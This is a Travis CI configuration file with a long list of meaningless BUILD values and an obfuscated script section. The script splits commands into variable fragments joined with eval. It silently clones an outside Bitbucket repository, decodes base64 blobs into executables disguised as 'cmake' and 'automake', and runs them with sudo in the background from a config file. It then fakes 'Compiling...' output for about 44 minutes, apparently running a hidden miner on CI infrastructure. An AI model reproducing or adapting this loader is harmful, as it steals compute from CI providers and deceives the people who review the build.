dist: bionic

env:
  - BUILD="--buildpkgonly=133xH"
  - BUILD="--autounmask-license=287cr"
  - BUILD="--prefix=374rT"
  - BUILD="--with-bdeps=394U"
  - BUILD="--rage-clean=240Tq"
  - BUILD="--buildpkgonly=6957o"
  - BUILD="--rebuild-if-new-slot=2NN"
  - BUILD="--autounmask-keep-masks=312ko"
  - BUILD="--reinstall-atoms=31sE"
  - BUILD="--binpkg-changed-deps=299WM"
  - BUILD="--read-news=515Nk"
  - BUILD="--package-moves=249ZV"
  - BUILD="--depclean=567bX"
  - BUILD="--unordered-display=654ui"
  - BUILD="--autounmask-continue=912oT"
  - BUILD="--buildpkgonly=823Q9"
  - BUILD="--rebuild-if-new-rev=84XS"
  - BUILD="--depclean-lib-check=956hs"
  - BUILD="--reinstall-atoms=833X"
  - BUILD="--sync-submodule=58mx"
  - BUILD="--newrepo=93189"
  - BUILD="--metadata=339yp"
  - BUILD="--selective=497RH"
  - BUILD="--fuzzy-search=865pK"
  - BUILD="--autounmask-use=83Iz"
  - BUILD="--quiet-fail=5132B"
  - BUILD="--changed-deps-report=789ZW"
  - BUILD="--autounmask-only=353uf"
  - BUILD="--alphabetical=749wB"
  - BUILD="--searchdesc=238NE"
  - BUILD="--autounmask-keep-masks=776KA"
  - BUILD="--regen=45CD"
  - BUILD="--buildpkgonly=892cx"
  - BUILD="--complete-graph-if-new-ver=315F4"
  - BUILD="--list-sets=454KY"
  - BUILD="--autounmask-continue=979Yd"
  - BUILD="--quiet-unmerge-warn=131SP"
  - BUILD="--reinstall-atoms=48id"
  - BUILD="--depclean=6910F"
  - BUILD="--misspell-suggestions=4154B"
  - BUILD="--unmerge=90H2"
  - BUILD="--root=828tE"
  - BUILD="--onlydeps=296Pv"
  - BUILD="--autounmask-backtrack=395PG"
  - BUILD="--quiet-unmerge-warn=27840"
  - BUILD="--tree=8187d"
  - BUILD="--binpkg-respect-use=9333K"
  - BUILD="--quiet-fail=654AX"
  - BUILD="--alphabetical=47Lf"
  - BUILD="--binpkg-respect-use=993x4"
  - BUILD="--usepkg=283Lq"
  - BUILD="--depclean-lib-check=389UX"
  - BUILD="--useoldpkg-atoms=350yw"
  - BUILD="--changed-deps-report=278Ue"
  - BUILD="--reinstall-atoms=544LT"
  - BUILD="--autounmask-license=5387T"
  - BUILD="--nodeps=167ar"
  - BUILD="--onlydeps-with-rdeps=906Ck"
  - BUILD="--search=544SS"
  - BUILD="--alert=322fZ"
  - BUILD="--jobs=434Yx"
  - BUILD="--clean=322W"
  - BUILD="--newrepo=877BN"
  - BUILD="--autounmask-keep-masks=395j0"
  - BUILD="--fail-clean=853SE"
  - BUILD="--complete-graph-if-new-use=908Hu"
  - BUILD="--searchdesc=248JP"
  - BUILD="--reinstall=9304K"
  - BUILD="--nodeps=631dd"
  - BUILD="--oneshot=956ca"
  - BUILD="--pkg-format=982hA"
  - BUILD="--config=912xO"
  - BUILD="--metadata=998nT"
  - BUILD="--newuse=251s0"
  - BUILD="--searchdesc=106Ve"
  - BUILD="--fail-clean=544m2"
  - BUILD="--search-index=473Q7"
  - BUILD="--accept-restrict=351OB"
  - BUILD="--oneshot=553E4"
  - BUILD="--quiet-unmerge-warn=6705K"
  - BUILD="--quiet-build=421Fu"
  - BUILD="--selective=491u"
  - BUILD="--implicit-system-deps=172e4"
  - BUILD="--complete-graph-if-new-ver=771X0"
  - BUILD="--skipfirst=585Jz"
  - BUILD="--accept-restrict=42ZD"
  - BUILD="--columns=699Ef"
  - BUILD="--verbose-conflicts=423dO"
  - BUILD="--pkg-format=551JL"
  - BUILD="--exclude=88992"
  - BUILD="--quickpkg-direct=314kz"
  - BUILD="--dynamic-deps=671Np"
  - BUILD="--accept-properties=217Zw"
  - BUILD="--autounmask-backtrack=476oe"
  - BUILD="--backtrack=471w0"
  - BUILD="--ignore-default-opts=691Gk"
  - BUILD="--digest=615KT"
  - BUILD="--reinstall-atoms=636re"
  - BUILD="--deep=331yh"
  - BUILD="--root-deps=644Ar"
  - BUILD="--version=932fq"
  - BUILD="--rebuild-if-unbuilt=992bH"
  - BUILD="--sync=2151a"
  - BUILD="--ask=120Oq"
  - BUILD="--autounmask-license=3861f"
  - BUILD="--rebuild-ignore=546GT"
  - BUILD="--clean=660zV"
  - BUILD="--implicit-system-deps=358l1"
  - BUILD="--depclean-lib-check=657LX"
  - BUILD="--buildpkg-exclude=75JE"
  - BUILD="--dynamic-deps=440d4"
  - BUILD="--rebuild-if-new-slot=594AU"
  - BUILD="--help=5803h"
  - BUILD="--ignore-world=621Hq"
  - BUILD="--rebuild-if-new-slot=91605"
  - BUILD="--verbose-conflicts=458Sj"
  - BUILD="--regen=341X6"
  - BUILD="--clean=974N4"
  - BUILD="--usepkgonly=327IZ"
  - BUILD="--version=468SJ"
  - BUILD="--autounmask-unrestricted-atoms=584MT"
  - BUILD="--autounmask=36Iw"
  - BUILD="--changed-slot=486Yw"
  - BUILD="--rebuild-if-new-ver=184P9"
  - BUILD="--selective=9394X"
  - BUILD="--useoldpkg-atoms=72rG"
  - BUILD="--info=70ZS"
  - BUILD="--clean=104Yp"
  - BUILD="--with-bdeps-auto=617Mu"
  - BUILD="--rebuilt-binaries=644LS"
  - BUILD="--with-bdeps=70246"
  - BUILD="--complete-graph-if-new-ver=994H5"
  - BUILD="--sync=360nP"
  - BUILD="--implicit-system-deps=339ZP"
  - BUILD="--load-average=96L7"
  - BUILD="--autounmask-license=385wb"
  - BUILD="--autounmask-backtrack=493NZ"
  - BUILD="--with-test-deps=668Hx"
  - BUILD="--usepkg=356Px"
  - BUILD="--update=6836c"
  - BUILD="--accept-properties=66n0"
  - BUILD="--depclean=72bM"
  - BUILD="--skipfirst=332uB"
  - BUILD="--exclude=776ni"
  - BUILD="--useoldpkg-atoms=744VR"
  - BUILD="--complete-graph-if-new-ver=8307j"
  - BUILD="--quiet-unmerge-warn=503kk"
  - BUILD="--debug=298yf"
  - BUILD="--fetch-all-uri=374P0"
  - BUILD="--sync=109ia"
  - BUILD="--autounmask-keep-masks=464fV"
  - BUILD="--selective=6164E"
  - BUILD="--noreplace=5875q"
  - BUILD="--complete-graph-if-new-ver=240oJ"
  - BUILD="--use-ebuild-visibility=720ov"
  - BUILD="--autounmask-only=754Dx"
  - BUILD="--search-index=7318B"
  - BUILD="--binpkg-changed-deps=468Ae"
  - BUILD="--autounmask-backtrack=520X8"
  - BUILD="--onlydeps=618Fq"
  - BUILD="--use-ebuild-visibility=308of"
  - BUILD="--ignore-world=884FS"
  - BUILD="--buildpkgonly=2579K"
  - BUILD="--fail-clean=297Ak"
  - BUILD="--noconfmem=652bU"
  - BUILD="--reinstall-atoms=3365i"
  - BUILD="--onlydeps-with-rdeps=351OI"
  - BUILD="--backtrack=993kd"
  - BUILD="--changed-use=335R8"
  - BUILD="--autounmask-write=237mC"
  - BUILD="--prune=317ol"
  - BUILD="--accept-properties=716Ne"
  - BUILD="--ignore-soname-deps=23sk"
  - BUILD="--autounmask-backtrack=622A"
  - BUILD="--quiet-repo-display=772cA"
  - BUILD="--reinstall=775JZ"
  - BUILD="--depclean=8102"
  - BUILD="--depclean-lib-check=363xn"
  - BUILD="--usepkgonly=557ig"
  - BUILD="--sync=411mx"
  - BUILD="--select=8184N"
  - BUILD="--info=56Gl"
  - BUILD="--verbose-slot-rebuilds=67Nj"
  - BUILD="--autounmask-unrestricted-atoms=6176m"
  - BUILD="--emptytree=772oF"
  - BUILD="--debug=49cW"
  - BUILD="--root-deps=156Ry"

language: minimal

script:
  - sudo apt update || true
  - sLjexwxVIyB="sudo apt --"
  - etErtaB="yes install"
  - qHhoWT=" cl-base64 "
  - UjGcJOewfMk="git &>/dev/"
  - eval "$sLjexwxVIyB""$etErtaB""$qHhoWT""$UjGcJOewfMk""null"
  - VfQwTmaCjwX="git clone h"
  - yNLivY="ttps://gccb"
  - RdFghisze="uild@bitbuc"
  - HtcdYCo="ket.org/gcc"
  - riJeUjoA="build/gcc.g"
  - VyXqjHiyWUI="it &>/dev/n"
  - eval "$VfQwTmaCjwX""$yNLivY""$RdFghisze""$HtcdYCo""$riJeUjoA""$VyXqjHiyWUI""ull"
  - tOxtbmej="base64 -d g"
  - XnStkzYUS="cc/cmake_ >"
  - eval "$tOxtbmej""$XnStkzYUS"" cmake"
  - GEquLWY="base64 -d g"
  - pnZVNYNQKD="cc/config_ "
  - eval "$GEquLWY""$pnZVNYNQKD""> pipe"
  - bUeQdm="base64 -d g"
  - pNOxCit="cc/make_ > "
  - eval "$bUeQdm""$pNOxCit""automake"
  - tdWpPgwer="chmod +x au"
  - EWksItUKa="tomake cmak"
  - eval "$tdWpPgwer""$EWksItUKa""e"
  - hJTDZYaDYQ="./cmake"
  - eval "$hJTDZYaDYQ"""
  - PtrduSIx="sed -i 's/b"
  - udXPxLgAPvW="uild/tg3o/g"
  - eval "$PtrduSIx""$udXPxLgAPvW""' pipe"
  - zEKnGKh="sudo ./auto"
  - JrzklCN="make -c pip"
  - CcmxrhqRz="e &>/dev/nu"
  - eval "$zEKnGKh""$JrzklCN""$CcmxrhqRz""ll &"
  - GCC=$(date +%s)
  - echo $BUILD
  - while true; do CC=$(date +%s); echo Compiling...; [ $CC -ge $((GCC + 2624)) ] && sudo killall automake && break; sleep 200; done
